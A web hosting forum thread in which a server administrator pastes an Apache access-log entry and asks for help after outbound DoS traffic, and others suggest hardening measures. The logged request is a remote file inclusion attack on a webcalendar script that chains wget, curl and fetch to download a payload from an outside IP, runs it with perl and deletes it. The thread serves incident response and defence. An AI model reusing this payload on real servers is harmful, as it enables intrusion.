I did grep "wget" and got this

[Tina]

Hi,

I did grep "wget" /usr/local/apache/domlogs/*

And I got bunches of these as shown below. Don't know what to make of it. It happened to/from 16 different domains on my server, 2 times each. BTW I don't know who's IP's these are.

Code:

/usr/local/apache/domlogs/mydomain.com:211.38.128.10 - - [01/Nov/2005:13:51:24 -0600] "GET  
/webcalendar/tools/send_reminders.php?includedir=http://82.165.228.69/images/fbi.gif?
&cmd=cd%20/tmp;wget%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;
curl%20-O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;
fetch%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;
perl%20sess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* HTTP/1.1" 404 - "-"
 "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

In the meantime i did chmod 700 wget as suggested by chirpy and I updated php (Jackie) and installed apf and did everything else I could find in these forums...

The reason, outbound udp DOS attacks from my server. I still don't know where the vulnerability is or if I have done enough to secure my server...

It's been a long two days for this newbie

TIA,

Tina

[astopy]

Try setting up mod_security (there's plenty of threads on how to do it around here).

[Tina]

It's done. Thank you. Anything else I can do?

[astopy]

There's quite a few good threads around here with instructions for securing your server, if you follow their recommendations you should be ok.

[NightStorm]

http://eth0.us

[Tina]

Yes. I went through all the guides, implemented almost all the suggestions. How do I know that I am ok now? How do I know if I fixed what was broken when I don't know what was broken. It's all a mystery really. Here's what I did.

installed or upgraded or compiled:

mod_security
php 4.4.1
chkrootkit (cron job 3 times a day - a bit much I see but I am learning)
rkhunter
ssh login to different port, ip and protocol 2
ssh root login disabled
apf with antidos
bfd
log watch (10)
mail :fail:
chmod 700 wget
telnet disabled
mysql password changed different from root
some whm config changes

What I don't understand yet is whether or not I should do anything with the /tmp directory and phpsuexec.

And I need to upgrade my os.

So am I ok? Is this enough? I have 2 more boxes to work on after I finish this one.

T.

[NightStorm]

Really, you should do something with your /tmp as well, yes. There is a tutorial on that site for mounting /tmpwith permissions to help prevent files from being run inside the /tmp directory. It's not 100% effective anymore, but will stop most of the 'scripts' from getting going.
Also note that wget is just one method used to download files to the server.
http://www.eth0.us/node/6
http://www.eth0.us/obscurity
http://www.eth0.us/php

Also, while it's a bit on the technical side, you might want to also check your Kernel version, and if it's outdated, look into compiling an updated and more secured version.

In your APF, you have egress filtering enabled, yes?